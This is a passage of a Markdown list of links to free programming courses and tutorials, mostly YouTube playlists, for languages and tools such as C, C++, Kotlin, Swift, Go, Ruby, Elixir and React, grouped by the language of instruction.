- [Linguagem C - Curso de Programação Completo para Iniciantes e Profissionais](https://www.youtube.com/playlist?list=PLrqNiweLEMonijPwsHckWX7fVbgT2jS3P)
- [Curso de Lógica e programação em C](https://www.youtube.com/playlist?list=PLtnFngjANe7EMzARU48QgecpyQdzWapoT)
> Cursos para aprender C em Inglês
- [C Programming for Beginners](https://www.youtube.com/playlist?list=PL98qAXLA6aftD9ZlnjpLhdQAOFI8xIB6e)
- [C Programming - Neso Academy](https://www.youtube.com/playlist?list=PLBlnK6fEyqRggZZgYpPMUxdY1CYkZtARR)
- [C Programming & Data Structures](https://www.youtube.com/playlist?list=PLBlnK6fEyqRhX6r2uhhlubuF5QextdCSM)
- [Programming in C - Jennys](https://www.youtube.com/playlist?list=PLdo5W4Nhv31a8UcMN9-35ghv8qyFWD9_S)
- [C Language Tutorials In Hindi](https://www.youtube.com/playlist?list=PLu0W_9lII9aiXlHcLx-mDH1Qul38wD3aR)
- [freeCodeCamp C / C++](https://www.youtube.com/playlist?list=PLWKjhJtqVAbmUE5IqyfGYEYjrZBYzaT4m)
- [C Programming Tutorials](https://www.youtube.com/playlist?list=PL_c9BZzLwBRKKqOc9TJz1pP0ASrxLMtp2)
- [C Language Tutorial Videos - Mr. Srinivas](https://www.youtube.com/playlist?list=PLVlQHNRLflP8IGz6OXwlV_lgHgc72aXlh)
- [Advanced C Programming](https://www.youtube.com/playlist?list=PL7CZ_Xc0qgmJFqNWEt4LIhAPTlT0sCW4C)
- [Free Online Programming Course in C for Beginners](https://www.youtube.com/playlist?list=PL76809ED684A081F3)
- [C Programming - Ankpro](https://www.youtube.com/playlist?list=PLUtTaqnx2RJLSUZgv0zp0aNWy9e1cbKd9)
- [C Programming Tutorials - The New Boston](https://www.youtube.com/playlist?list=PL6gx4Cwl9DGAKIXv8Yr6nhGJ9Vlcjyymq)
- [C Programming - IntelliPaat](https://www.youtube.com/playlist?list=PLVHgQku8Z935hrZwx751XoyqDROH_tYMY)
- [Learn C programming - edureka!](https://www.youtube.com/playlist?list=PL9ooVrP1hQOFrNo8jK9Yb2g2eMHz7hTu9)
- [C Programming Tutorials - Saurabh Shukla](https://www.youtube.com/playlist?list=PLe_7x5eaUqtWp9fvsxhC4XIkoR3n5A-sF)
## 🐸 Sites e cursos para aprender C++
> Cursos para aprender C++ em Português
- [Curso C++ - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003QTw6OhCOFb1Fdl8Uiqyrqo)
- [Curso de C e C++ - Daves Tecnologia](https://www.youtube.com/playlist?list=PL5EmR7zuTn_bONyjFxSO4ZCE-SVVNFGkS)
- [Curso Programação em C/C++](https://www.youtube.com/playlist?list=PLC9E87254BD7A875B)
- [Curso C++ para iniciantes](https://www.youtube.com/playlist?list=PL8eBmR3QtPL13Dkn5eEfmG9TmzPpTp0cV)
- [Curso de C++ e C#](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxhro_xZd-PCUDUsgg8tZFKh)
- [Curso C++](https://www.youtube.com/playlist?list=PL6xP0t6HQYWcUPcXLu2XTZ3gOCJSmolgO)
- [Curso de C++ - A linguagem de programação fundamental para quem quer ser um programador](https://www.youtube.com/playlist?list=PLx4x_zx8csUjczg1qPHavU1vw1IkBcm40)
> Cursos para aprender C++ em Espanhol
- [Programación en C++](https://www.youtube.com/playlist?list=PLWtYZ2ejMVJlUu1rEHLC0i_oibctkl0Vh)
- [Curso en C++ para principiantes](https://www.youtube.com/playlist?list=PLDfQIFbmwhreSt6Rl2PbDpGuAEqOIPmEu)
- [C++ desde cero](https://www.youtube.com/playlist?list=PLAzlSdU-KYwWsM0FgOs4Jqwnr5zhHs0wU)
- [Curso de Interfaces Graficas en C/C++](https://www.youtube.com/playlist?list=PLYA44wBp7zVTiCJiXIC5H5OkMOXptxLOI)
> Cursos para aprender C++ em Inglês
- [C++ Programming Course - Beginner to Advanced 31 hours](https://www.youtube.com/watch?v=8jLOx1hD3_o&ab_channel=freeCodeCamp.org)
- [C++ Full Course For Beginners (Learn C++ in 10 hours)](https://www.youtube.com/watch?v=GQp1zzTwrIg&ab_channel=CodeBeauty)
- [C++ Tutorial for Beginners - Learn C++ in 1 Hour](https://www.youtube.com/watch?v=ZzaPdXTrSb8&ab_channel=ProgrammingwithMosh)
- [C++ Tutorial: Full Course for Beginners](https://www.youtube.com/watch?v=-TkoO8Z07hI&ab_channel=BroCode)
- [C++ Tutorial for Beginners - Complete Course](https://www.youtube.com/watch?v=vLnPwxZdW4Y&ab_channel=freeCodeCamp.org)
- [C++ Programming All-in-One Tutorial Series (10 HOURS!)](https://www.youtube.com/watch?v=_bYFu9mBnr4&ab_channel=CalebCurry)
- [C++ Full Course 2022](https://www.youtube.com/watch?v=SYd5F4gIH90&ab_channel=Simplilearn)
- [C++ Crash Course](https://www.youtube.com/watch?v=uhFpPlMsLzY&ab_channel=BroCode)
- [C++ - The Cherno](https://www.youtube.com/playlist?list=PLlrATfBNZ98dudnM48yfGUldqGD0S4FFb)
- [C++ Full Course | C++ Tutorial | Data Structures & Algorithms](https://www.youtube.com/playlist?list=PLfqMhTWNBTe0b2nM6JHVCnAkhQRGiZMSJ)
- [C++ Programming - Neso Academy](https://www.youtube.com/playlist?list=PLBlnK6fEyqRh6isJ01MBnbNpV3ZsktSyS)
- [C++ Complete Course](https://www.youtube.com/playlist?list=PLdo5W4Nhv31YU5Wx1dopka58teWP9aCee)
- [C++ Tutorials In Hindi](https://www.youtube.com/playlist?list=PLu0W_9lII9agpFUAlPFe_VNSlXW5uE0YL)
- [C++ Online Training](https://www.youtube.com/playlist?list=PLWPirh4EWFpGDG3--IKMLPoYrgfuhaz_t)
- [C / C++ - freeCodeCamp Playlist](https://www.youtube.com/playlist?list=PLWKjhJtqVAbmUE5IqyfGYEYjrZBYzaT4m)
- [C++ Modern Tutorials](https://www.youtube.com/playlist?list=PLgnQpQtFTOGRM59sr3nSL8BmeMZR9GCIA)
## 🦉 Sites e cursos para aprender Camunda
> Cursos para aprender Camunda em Português
- [Curso de Camunda - Limers Dev](https://www.youtube.com/playlist?list=PLb7Px7q28I7UqIdEnZDP0RCPB2wEvO7KW)
- [Curso de Camunda - Fabulous Code](https://www.youtube.com/watch?v=f9DmrLPMjRM&t=6s&ab_channel=FabulousCode)
- [Curso Modelagem de Processos com Camunda BPM](https://www.youtube.com/playlist?list=PLI0t5VwNU4XNvkWYXPryepPwCCxsrEyZH)
> Cursos para aprender Camunda em Inglês
- [Tutorial: How to Get Started With Camunda Platform 7 Run](https://www.youtube.com/watch?v=l-sCUKQZ44s&list=PLJG25HlmvsOUnCziyJBWzcNh7RM5quTmv&ab_channel=Camunda)
- [Getting Started with Camunda Platform 7](https://www.youtube.com/playlist?list=PLJG25HlmvsOUnCziyJBWzcNh7RM5quTmv)
- [Camunda First Steps Course - English](https://www.youtube.com/playlist?list=PLI0t5VwNU4XP-D9sw8_34VV9QD4wlLxtQ)
- [Camunda Complete Tutrorial for Java](https://www.youtube.com/playlist?list=PLLUFZCmqicc-ESKvg3XZE-7yX5o_0PPED)
- [Camunda BPMN Tutorials - Arindam Mukherjee](https://www.youtube.com/playlist?list=PLago6eYwkX8g8PFjN3-7u0yCbKYjdSTUF)
- [Camunda Learning - Sairam Gopalakrishnan](https://www.youtube.com/playlist?list=PLTFuYAuDJIcOd-RCNZ5PtwyfRR4Gq9XMv)
## 🐶 Sites e cursos para aprender Kotlin
> Cursos para aprender Kotlin em Português
- [Documentação Oficial do Kotlin](https://kotlinlang.org/docs/home.html)
- [Curso de Kotlin 2020 | Básico](https://youtube.com/playlist?list=PLPs3nlHFeKTr-aDDvUxU971rPSVTyQ6Bn)
- [Curso de Kotlin - Programação para Iniciantes](https://www.youtube.com/playlist?list=PLmcyA-BbqsvJnOZoGNHPMF1dCBq0m6Qzg)
- [Curso Básico de Kotlin - Fabiano Góes ](https://www.youtube.com/playlist?list=PLM8_o_MDe-LEpabjij2vyHZnxI7Knrxkj)
- [Mini Curso - Web API Kotlin do Zero](https://www.youtube.com/playlist?list=PLM8_o_MDe-LEas_XSKIyaFAp_MS__5j4p)
- [Programação Android - Geraldo Melo](https://www.youtube.com/playlist?list=PLHZwU4kNI8DXL2ennM5kR8kHm5zwS6hOz)
- [Mini Curso - Conceitos básicos de Kotlin](https://www.youtube.com/playlist?list=PLM8_o_MDe-LElQqV-SZtlyGt8l7iz770r)
- [Aplicativo Android Kotlin - Salário Mês](https://www.youtube.com/playlist?list=PLufC_h3b0C2BbBfAB3rZXXkhtRDEuQFcq)
- [Curso de Kotlin - Professor MarcoMaddo](https://www.youtube.com/playlist?list=PLDqAb8tE7SQYE7NJqwuku7e1S46MOav6X)
- [Curso de Kotlin e Spring - Fabiano Góes](https://www.youtube.com/playlist?list=PLM8_o_MDe-LEu4XrXKjA48dt1d07FPYP1)
- [Curso de Kotlin - Tutorial para Iniciantes Android](https://www.youtube.com/watch?v=r_6Ku38sA-c&t=11746s)
- [Fundamentos Android Kotlin](https://cursos.alura.com.br/course/fundamentos-android-kotlin)
> Cursos para aprender Kotlin em Espanhol
- [Curso de Kotlin desde cero - Danisable](https://www.youtube.com/playlist?list=PLAzlSdU-KYwVlDl-939Vv0_r5XhU7zgX1)
- [Curso de Kotlin de 0 a 100 - Programador Novato](https://www.youtube.com/playlist?list=PLCTD_CpMeEKSjzbsW_zmVNz23GyOVsdbS)
- [Curso de Programacion Android desde cero en Kotlin](https://www.youtube.com/playlist?list=PL8ie04dqq7_M8nfPA9DPiAy7NsoZQpVAf)
> Cursos para aprender Kotlin em Inglês
- [Kotlin Crash Course](https://www.youtube.com/watch?v=5flXf8nuq60&ab_channel=TraversyMedia)
- [Android Kotlin Course - Dr. Parag Shukla](https://www.youtube.com/playlist?list=PLATOxdAcWIvPbiiK0_mn_LTQyS1FBYdaW)
- [Kotlin Course - Tutorial for Beginners](https://www.youtube.com/watch?v=F9UC9DY-vIU&ab_channel=freeCodeCamp.org)
- [Kotlin Tutorial for Beginners: The Kotlin Programming Language Full 9-hour Kotlin Course](https://www.youtube.com/watch?v=wuiT4T_LJQo&ab_channel=DonnFelker-FreelancingforSoftwareDevelopers)
- [Learn Kotlin Programming – Full Course for Beginners](https://www.youtube.com/watch?v=EExSSotojVI&ab_channel=freeCodeCamp.org)
- [Kotlin & Android 12 Tutorial | Learn How to Build an Android App - 9h Free Development Masterclass](https://www.youtube.com/watch?v=HwoxgUPabMk&ab_channel=tutorialsEU)
- [Kotlin Programming Fundamentals Tutorial - Full Course](https://www.youtube.com/watch?v=AeC4G-H-MQA&ab_channel=freeCodeCamp.org)
- [Android Development(Kotlin) Full Course For Beginners 2022 | 12 Hour Comprehensive Tutorial For Free](https://www.youtube.com/watch?v=BCSlZIUj18Y&ab_channel=AppDevNotes)
- [Learn Kotlin From Zero to Hero in 10 Hours](https://www.youtube.com/watch?v=cxm9AHNDMPI&ab_channel=MasterCoding)
- [Android Development Course - Build Native Apps with Kotlin Tutorial](https://www.youtube.com/watch?v=Iz08OTTjR04&ab_channel=freeCodeCamp.org)
- [Android Programming Course - Kotlin, Jetpack Compose UI, Graph Data Structures & Algorithms](https://www.youtube.com/watch?v=bo_LP6QOUio&ab_channel=freeCodeCamp.org)
- [Kotlin Course for Beginners and Java Devs](https://www.youtube.com/playlist?list=PLrnPJCHvNZuAIbejjZA1kGfLeA8ZpICB2)
- [The Kotlin Programming Language Course for Beginners](https://www.youtube.com/playlist?list=PLVUm4IewkTXqwzuRXZisWg7shMTiQhUtz)
- [The Complete Kotlin Developer Course](https://www.youtube.com/playlist?list=PL6Q9UqV2Sf1h0Jox_BLZV3gqmMM1sWKUD)
- [Kotlin Tutorial for Beginners: Basics and Fundamentals for beginners](https://www.youtube.com/playlist?list=PLlxmoA0rQ-LwgK1JsnMsakYNACYGa1cjR)
- [Kotlin Beginner Tutorials Hindi | Complete Series](https://www.youtube.com/playlist?list=PLRKyZvuMYSIMW3-rSOGCkPlO1z_IYJy3G)
- [Android Kotlin Programing](https://www.youtube.com/playlist?list=PLaoF-xhnnrRUEbF6cvk4-CeBAEOSbp8sS)
- [Learn Kotlin - Kotlin Tutorial For Beginners](https://www.youtube.com/playlist?list=PL6nth5sRD25iv8jZrQWD-5dXgu56ae5m8)
- [Kotlin Tutorial - Telusko](https://www.youtube.com/playlist?list=PLsyeobzWxl7rooJFZhc3qPLwVROovGCfh)
## 🐋 Sites e cursos para aprender Swift
> Cursos para aprender Swift em Português
- [Curso de Swift- Tiago Aguiar](https://www.youtube.com/playlist?list=PLJ0AcghBBWShgIH122uw7H9T9-NIaFpP-)
- [Curso grátis Swift e SwiftUI (Stanford 2020)](https://www.youtube.com/playlist?list=PLMdYygf53DP46rneFgJ7Ab6fJPcMvr8gC)
- [Curso de Swift - Desenvolvimento IOS Apple](https://www.youtube.com/playlist?list=PLxNM4ef1BpxjjMKpcYSqXI4eY4tZG2csm)
- [Curso iOS e Swift](https://www.youtube.com/playlist?list=PLW-gR4IAiL9ubGKgE5MsyzwovmeOF7nt_)
> Cursos para aprender Swift em Espanhol
- [Curso de programación con Swift](https://www.youtube.com/playlist?list=PLNdFk2_brsRc57R6UaHy4zx_FHqx236G1)
- [Curso programación iOS con Xcode y Swift](https://www.youtube.com/playlist?list=PLNdFk2_brsRcWM-31vJUgyHIGpopIDw4s)
- [Curso Swift en Español desde cero [2022]](https://www.youtube.com/playlist?list=PLeTOFRUxkMcozbUpMiaHRy8_GjzJ_9tyi)
- [Curso de Swift Español - Clonando YouTube](https://www.youtube.com/playlist?list=PLT_OObKZ3CpuEomHCc6v-49u3DFCdCyLH)
- [Curso De Swift - Código Facilito](https://www.youtube.com/playlist?list=PLTPmvYfJJMVp_YzS22WI-5NYW1c_7eTBD)
- [Curso de SwiftUI](https://www.youtube.com/playlist?list=PLNdFk2_brsRetB7LiUfpnIclBe_1iOS4M)
- [Curso Xcode y Swift desde cero](https://www.youtube.com/playlist?list=PLNdFk2_brsRdyYGDX8QLFKmcpQPjFFrDC)
- [Aprende Swift 3 desde cero](https://www.youtube.com/playlist?list=PLD2wfKpqmxnmnjA7lcbc2M2P6TfygmrL3)
- [Curso de Swift 4 desde cero](https://www.youtube.com/playlist?list=PLD2wfKpqmxnn7-hEmKx7P3xDY8iYWsz59)
- [Curso Introducción a Swift](https://www.youtube.com/playlist?list=PLvQAED-MnQpaJrSjVW449S8Kda3wGQqKD)
> Cursos para aprender Swift em Inglês
- [Swift Tutorial - Full Course for Beginners](https://www.youtube.com/watch?v=comQ1-x2a1Q&ab_channel=freeCodeCamp.org)
- [Learn Swift Fast (2020) - Full Course For Beginners](https://www.youtube.com/watch?v=FcsY1YPBwzQ&ab_channel=CodeWithChris)
- [2021 SwiftUI Tutorial for Beginners (3.5 hour Masterclass)](https://www.youtube.com/watch?v=F2ojC6TNwws&ab_channel=CodeWithChris)
- [Swift Tutorial For Beginners [Full Course] Learn Swift For iOS Development](https://www.youtube.com/watch?v=mhE-Mp07RTo&ab_channel=Devslopes)
- [Swift Programming Tutorial | FULL COURSE | Absolute Beginner](https://www.youtube.com/watch?v=CwA1VWP0Ldw&ab_channel=SeanAllen)
- [Swift Programming Tutorial for Beginners (Full Tutorial)](https://www.youtube.com/watch?v=Ulp1Kimblg0&ab_channel=CodeWithChris)
## 🐬 Sites e cursos para aprender Go
> Sites para aprender Go
- [Onde aprender e estudar GoLang?](https://coodesh.com/blog/candidates/backend/onde-aprender-e-estudar-golang/#:~:text=%E2%8C%A8%EF%B8%8F%20Udemy,11%2C5%20horas%20de%20videoaula.)
- [Go Lang - School Of Net](https://www.schoolofnet.com/cursos/programacao/go-lang/)
- [48 horas para aprender Go](https://medium.com/@anapaulagomes/48-horas-para-aprender-go-4542b51d84a4)
- [Estudo em GoLang: from Zero to Hero com materiais gratuitos!](https://medium.com/hurb-labs/estudo-em-golang-from-zero-to-hero-com-materiais-gratuitos-6be72aeea30f)
> Cursos para aprender Go em Português
- [Aprenda Go](https://www.youtube.com/playlist?list=PLCKpcjBB_VlBsxJ9IseNxFllf-UFEXOdg)
- [Aprenda Go / Golang (Curso Tutorial de Programação)](https://www.youtube.com/playlist?list=PLUbb2i4BuuzCX8CLeArvx663_0a_hSguW)
- [Go Lang do Zero](https://www.youtube.com/playlist?list=PL5aY_NrL1rjucQqO21QH8KclsLDYu1BIg)
- [Curso de Introdução a Linguagem Go (Golang)](https://www.youtube.com/playlist?list=PLXFk6ROPeWoAvLMyJ_PPfu8oF0-N_NgEI)
- [Curso Programação Golang](https://www.youtube.com/playlist?list=PLpZslZJHL2Q2hZXShelGADqCR_fcOhF9K)
> Cursos para aprender Go em Espanhol
- [Curso de Go (Golang)](https://www.youtube.com/playlist?list=PLt1J5u9LpM5-L-Ps8jjr91pKhFxAnxKJp)
- [Aprendiendo a programar con Go](https://www.youtube.com/playlist?list=PLSAQnrUqbx7sOdjJ5Zsq5FvvYtI8Kc-C5)
- [Curso Go - de 0 a 100](https://www.youtube.com/playlist?list=PLhdY0D_lA34W1wS2nJmQr-sssMDuQf-r8)
- [Curso Go - CodigoFacilito](https://www.youtube.com/playlist?list=PLdKnuzc4h6gFmPLeous4S0xn0j9Ik2s3Y)
- [Curso GO (Golang Español) - De 0 a 100](https://www.youtube.com/playlist?list=PLl_hIu4u7P64MEJpR3eVwQ1l_FtJq4a5g)
- [Curso de Golang para principiante](https://www.youtube.com/playlist?list=PLm28buT4PAtbsurufxiw9k2asnkin4YLd)
> Cursos para aprender Go em Inglês
- [Golang Tutorial for Beginners | Full Go Course](https://www.youtube.com/watch?v=yyUHQIec83I&ab_channel=TechWorldwithNana)
- [Learn Go Programming - Golang Tutorial for Beginners](https://www.youtube.com/watch?v=YS4e4q9oBaU&ab_channel=freeCodeCamp.org)
- [Backend master class [Golang, Postgres, Docker]](https://www.youtube.com/playlist?list=PLy_6D98if3ULEtXtNSY_2qN21VCKgoQAE)
- [Let's go with golang](https://www.youtube.com/playlist?list=PLRAV69dS1uWQGDQoBYMZWKjzuhCaOnBpa)
- [Go Programming Language Tutorial | Golang Tutorial For Beginners | Go Language Training](https://www.youtube.com/playlist?list=PLS1QulWo1RIaRoN4vQQCYHWDuubEU8Vij)
- [Golang Tutorials](https://www.youtube.com/playlist?list=PLzMcBGfZo4-mtY_SE3HuzQJzuj4VlUG0q)
- [Golang course - Duomly](https://www.youtube.com/playlist?list=PLi21Ag9n6jJJ5bq77cLYpCgOaONcQNqm0)
- [Golang Course - Evhenii Kozlov](https://www.youtube.com/playlist?list=PLgUAJTkYL6T_-PXWgVFGTkz863zZ_1do0)
- [Golang Development](https://www.youtube.com/playlist?list=PLzUGFf4GhXBL4GHXVcMMvzgtO8-WEJIoY)
- [Golang Crash Course](https://www.youtube.com/playlist?list=PL3eAkoh7fypqUQUQPn-bXtfiYT_ZSVKmB)
- [Golang Course From A to Z - 5 Hours of Video](https://www.youtube.com/playlist?list=PLuMFwYAgU7ii-z4TGGqXh1cJt-Dqnk2eY)
## 🐦 Sites e cursos para aprender Ruby
> Cursos para aprender Ruby em Português
- [Ruby Para Iniciantes (2021 - Curso Completo Para Iniciantes)](https://www.youtube.com/playlist?list=PLnV7i1DUV_zOit4a_tEDf1_PcRd25dL7e)
- [Curso completo de Ruby](https://www.youtube.com/playlist?list=PLdDT8if5attEOcQGPHLNIfnSFiJHhGDOZ)
- [Curso de Ruby on Rails para Iniciantes](https://www.youtube.com/playlist?list=PLe3LRfCs4go-mkvHRMSXEOG-HDbzesyaP)
- [Curso de Ruby on Rails básico](https://www.youtube.com/playlist?list=PLFeyfVYazTkJN6uM5opCfSN_xjxrMybXV)
- [Programação com Ruby](https://www.youtube.com/playlist?list=PLucm8g_ezqNqMm1gdqjZzfhAMFQ9KrhFq)
- [Linguagem Ruby](https://www.youtube.com/playlist?list=PLEdPHGYbHhldWUFs2Q-jSzXAv3NXh4wu0)
> Cursos para aprender Ruby em Espanhol
- [Curso Gratuito de Ruby en español](https://www.youtube.com/playlist?list=PL954bYq0HsCUG5_LbfZ54YltPinPSPOks)
- [Ruby desde Cero](https://www.youtube.com/playlist?list=PLAzlSdU-KYwUG_5HcRVT4mr0vgLYBeFnm)
- [Curso de Ruby](https://www.youtube.com/playlist?list=PLEFC2D43C36013A70)
- [Curso Ruby - Codigofacilito](https://www.youtube.com/playlist?list=PLUXwpfHj_sMlkvu4T2vvAnqPSzWQsPesm)
- [Curso Ruby on Rails 7 para principiantes en español](https://www.youtube.com/playlist?list=PLP06kydD_xaUS6plnsdonHa5ySbPx1PrP)
- [Curso de Ruby on Rails 5](https://www.youtube.com/playlist?list=PLIddmSRJEJ0uaT5imV49pJqP8CGSqN-7E)
> Cursos para aprender Ruby em Inglês
- [Learn Ruby on Rails - Full Course](https://www.youtube.com/watch?v=fmyvWz5TUWg&ab_channel=freeCodeCamp.org)
- [Ruby On Rails Crash Course](https://www.youtube.com/watch?v=B3Fbujmgo60&ab_channel=TraversyMedia)
- [Ruby Programming Language - Full Course](https://www.youtube.com/watch?v=t_ispmWmdjY&ab_channel=freeCodeCamp.org)
- [Ruby on Rails Tutorial for Beginners - Full Course](https://www.youtube.com/watch?v=-AdqKjqHQIA&ab_channel=CodeGeek)
- [Learn Ruby on Rails from Scratch](https://www.youtube.com/watch?v=2zZCzcupQao&ab_channel=ProgrammingKnowledge)
- [The complete ruby on rails developer course](https://www.youtube.com/watch?v=y4pKYYMdAA0&ab_channel=FullCourse)
- [Ruby on Rails for Beginners](https://www.youtube.com/playlist?list=PLm8ctt9NhMNV75T9WYIrA6m9I_uw7vS56)
- [Ruby on Rails Full Course](https://www.youtube.com/playlist?list=PLsikuZM13-0zOytkeVGSKk4VTTgE8x1ns)
- [Full Stack Ruby on Rails Development Bootcamp](https://www.youtube.com/playlist?list=PL6SEI86zExmsdxwsyEQcFpF9DWmvttPPu)
- [Let's Build: With Ruby On Rails](https://www.youtube.com/playlist?list=PL01nNIgQ4uxNkDZNMON-TrzDVNIk3cOz4)
- [Ruby On Rail Full Course 2022](https://www.youtube.com/playlist?list=PLAqsB9gf_hQY6pwlIbht35wSytqezS-Sy)
- [Advanced Ruby on Rails](https://www.youtube.com/playlist?list=PLPiVX6hQQRl_UN9cLxSoGKQm_RF8pw7MU)
- [Ruby On Rails 2021 | Complete Course](https://www.youtube.com/playlist?list=PLeMlKtTL9SH_J-S0JA9o5gUmcW-NZSDtF)
## 💧 Sites e cursos para aprender Elixir
> Cursos para aprender Elixir em Português
- [Curso de Elixir básico - Adolfo Neto](https://www.youtube.com/watch?v=2weVIXHyIwI&list=PLF5ttO8F-IsT42x53iFxOhmY70AWf-nd6&index=53&ab_channel=AdolfoNeto)
- [Curso de Elixir na prática - Elly Academy](https://www.youtube.com/watch?v=GXlyLSVDkhI&list=PLydk1OOOmzo8VBeU334j4R4WvSByRNpXR&ab_channel=ELLYACADEMY)
- [Curso - Aprenda com quem não sabe](https://www.youtube.com/playlist?list=PLr4c053wuXU-YY4GmqUM3y_uauspsmO0O)
- [Alquimia Stone - Formação Gratuita em Elixir](https://www.youtube.com/playlist?list=PLv3nyCBtlWP8I9rknIrfcJWrO05yEzknD)
- [Repositórios Elixir4Noobs para iniciantes](https://github.com/aleDsz/elixir4noobs)
- [Elixir School em Português - Documentação Oficial](https://elixirschool.com/pt)
> Cursos para aprender Elixir em Inglês
- [Elixir in 100 Seconds - Fi](https://www.youtube.com/watch?v=R7t7zca8SyM)
- [Elixir Tutorial - Derek Banas](https://www.youtube.com/watch?v=pBNOavRoNL0&ab_channel=DerekBanas)
- [Elixir & Phoenix Fundamentals Full Course For Beginners](https://www.youtube.com/watch?v=gRQIPvDFuts&ab_channel=Elixirprogrammer)
- [From Zero to Hero in Elixir](https://www.youtube.com/playlist?list=PLaY7qWIrmqtFoZLvOvYRZG5hl367UybRp)
- [Elixir Tutorial Series - Plangora](https://www.youtube.com/playlist?list=PL6gboNCsWvTcL1ypq1KUAG3ar1iRPdPxL)
- [Intro to Elixir - Tensor Programming](https://www.youtube.com/playlist?list=PLJbE2Yu2zumA-p21bEQB6nsYABAO-HtF2)
## 🐷 Sites e cursos para aprender React
> Cursos para aprender React em Português
- [React em 1h - Componentes - Iniciantes](https://www.youtube.com/watch?v=K65wUN-2no4&ab_channel=MaykBrito)
- [Aprenda React em 2 horas - Crie seu primeiro projeto em React](https://www.youtube.com/watch?v=pOVyVivyfok&ab_channel=MatheusBattisti-HoradeCodar)
- [Curso de React - Matheus Battisti](https://www.youtube.com/playlist?list=PLnDvRpP8BneyVA0SZ2okm-QBojomniQVO)
- [Curso de React - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUh752BVDGZkxYpY9lS40fyC)
- [Curso de React com Material UI 5 e Typescript - Lucas Souza Dev](https://www.youtube.com/playlist?list=PL29TaWXah3iaqOejItvW--TaFr9NcruyQ)
- [Curso de React com Typescript - Lucas Souza Dev](https://www.youtube.com/playlist?list=PL29TaWXah3iZktD5o1IHbc7JDqG_80iOm)
- [Mini Curso ReactJS e Typescript - Jorge Aluizio](https://www.youtube.com/playlist?list=PLE0DHiXlN_qpm0nMlvcVxG_O580IXmeRU)
- [Curso de React - João Ribeiro](https://www.youtube.com/playlist?list=PLXik_5Br-zO9YVs9bxi7zoQlKq59VPTX1)
- [Mini Curso de React - Celke](https://www.youtube.com/playlist?list=PLmY5AEiqDWwDSteAR-56wL9LjHPK0mrYE)
- [Curso de JavaScript para React - Marcos Bruno](https://www.youtube.com/playlist?list=PLirko8T4cEmzWZVn_ZKQbfDOuCnSZJ4va)
- [Aprenda React na prática - Flipix](https://www.youtube.com/playlist?list=PLXe1Uv1JGlTbrdrcZIZOabEBSpeNeVHD7)
- [Curso de React JS - Programador Espartano](https://www.youtube.com/playlist?list=PLGwqoftZstLbwYNomwVgNHtWlJitUCiAz)
- [Curso de ReactJS do Amador ao Profissional](https://www.youtube.com/playlist?list=PLXik_5Br-zO_47e0Zdjog8t2z76Fhlf9M)
- [Curso React + NextJS - Dev & Design](https://www.youtube.com/playlist?list=PLeBknJ2kuv1mDABV2N-H2tcu1vbfffRvg)
- [Curso Intensivo de Next JS e React](https://www.cod3r.com.br/courses/curso-intensivo-next-react)
- [Curso de React Native - com Hooks e Context API - Cadastro Completo](https://www.cod3r.com.br/courses/react-native-crud)
> Projetos para praticar React em Português
- [Crie um Quiz com React.js - Projeto de React para iniciantes](https://www.youtube.com/watch?v=HlkbeikH8cs&ab_channel=MatheusBattisti-HoradeCodar)
- [Crie um Sistema de Controle de Finanças com React.JS](https://www.youtube.com/watch?v=pj4vA67olbU&ab_channel=WillDev)
- [Projeto de Filmes com React & API do TMDB (React Router, React Hooks)](https://www.youtube.com/watch?v=XqxUHVVO7-U&ab_channel=MatheusBattisti-HoradeCodar)
- [Criando uma Pokédex com React.JS e PokeAPI](https://www.youtube.com/watch?v=dqMae44pEVk&ab_channel=LeoUjo)
- [Criando Projeto de buscar CEP do Zero com ReactJS](https://www.youtube.com/watch?v=oy4cbqE1_qc&ab_channel=Sujeitoprogramador)
- [Lista de Tarefas em React com Typescript](https://www.youtube.com/watch?v=95sAtAareR8&list=PL_kvSTSEFm2CwHCtvTk0llGDvM0L2jx3O&index=3&t=2s&ab_channel=BoniekyLacerda)
- [Sistema de Finanças Pessoais em React com Typescript)](https://www.youtube.com/watch?v=_hytKpMc04E&list=PL_kvSTSEFm2CwHCtvTk0llGDvM0L2jx3O&index=4&ab_channel=BoniekyLacerda)
- [Galeria de Fotos em React com Typescript e Firebase](https://www.youtube.com/watch?v=ss4BXa-WfgI&list=PL_kvSTSEFm2CwHCtvTk0llGDvM0L2jx3O&index=5&ab_channel=BoniekyLacerda)
- [Crie um Jogo de RPG em React](https://www.youtube.com/watch?v=smapdudo7F8&list=PL_kvSTSEFm2CwHCtvTk0llGDvM0L2jx3O&index=6&ab_channel=BoniekyLacerda)
- [Formulário multi-etapas em React com Typescript](https://www.youtube.com/watch?v=W1Ed9TEMGJU&list=PL_kvSTSEFm2CwHCtvTk0llGDvM0L2jx3O&index=7&ab_channel=BoniekyLacerda)
- [Clone do Netflix em React para Iniciantes](https://www.youtube.com/watch?v=tBweoUiMsDg&ab_channel=BoniekyLacerda)
- [Criando uma landing page com React & Compilando](https://www.youtube.com/watch?v=xmgx9P4W21o&ab_channel=DankiCode)
- [Projeto de React & SaSS para o seu portfólio - Integração de React com SaSS](https://www.youtube.com/watch?v=5h4vMtBlQQU&ab_channel=MatheusBattisti-HoradeCodar)
- [Pokedex com API & React, React hooks, useState, useContext, localStorage](https://www.youtube.com/watch?v=n2kkXup2T1c&ab_channel=pasquadev)
- [Landing Page: Ingresso para Marte com ReactJS e Styled Components](https://www.youtube.com/watch?v=EhnXaybirdA&ab_channel=Rocketseat)
- [Sistema de Login com React.JS - (Autenticação, Context API, Hooks)](https://www.youtube.com/watch?v=LjJFu6Y6MrU&ab_channel=WillDev)
- [Playlist com 153 projetos para realizar com ReactJS](https://www.youtube.com/playlist?list=PL3_3koQ96v-43eOIX4WojSoYv-hKNES5b)
- [Playlist com 7 projetos para realizar om ReactJS](https://www.youtube.com/playlist?list=PL3-lIzXmBDZSOn8gwFezet2bYphKwzEbq)
- [Playlist com 56 projetos utilizando ReactJS e NodeJS](https://www.youtube.com/playlist?list=PL3_3koQ96v-6TE20IvdBDrntFcYjwHggb)
- [Playlist com 9 projetos para realizar om ReactJS](https://www.youtube.com/playlist?list=PLM_Zgiu-XicusQmIprOkC6cRba3l_uwB7)
- [Playlist de desenvolvimento web com 1.050 vídeos](https://www.youtube.com/playlist?list=PL45i6mPs-neh9PGc1gHkJUj3GQt4mI5fx)
> Cursos para aprender React em Inglês
- [React Course - Beginner's Tutorial for React JavaScript Library [2022]](https://www.youtube.com/watch?v=bMknfKXIFA8&ab_channel=freeCodeCamp.org)
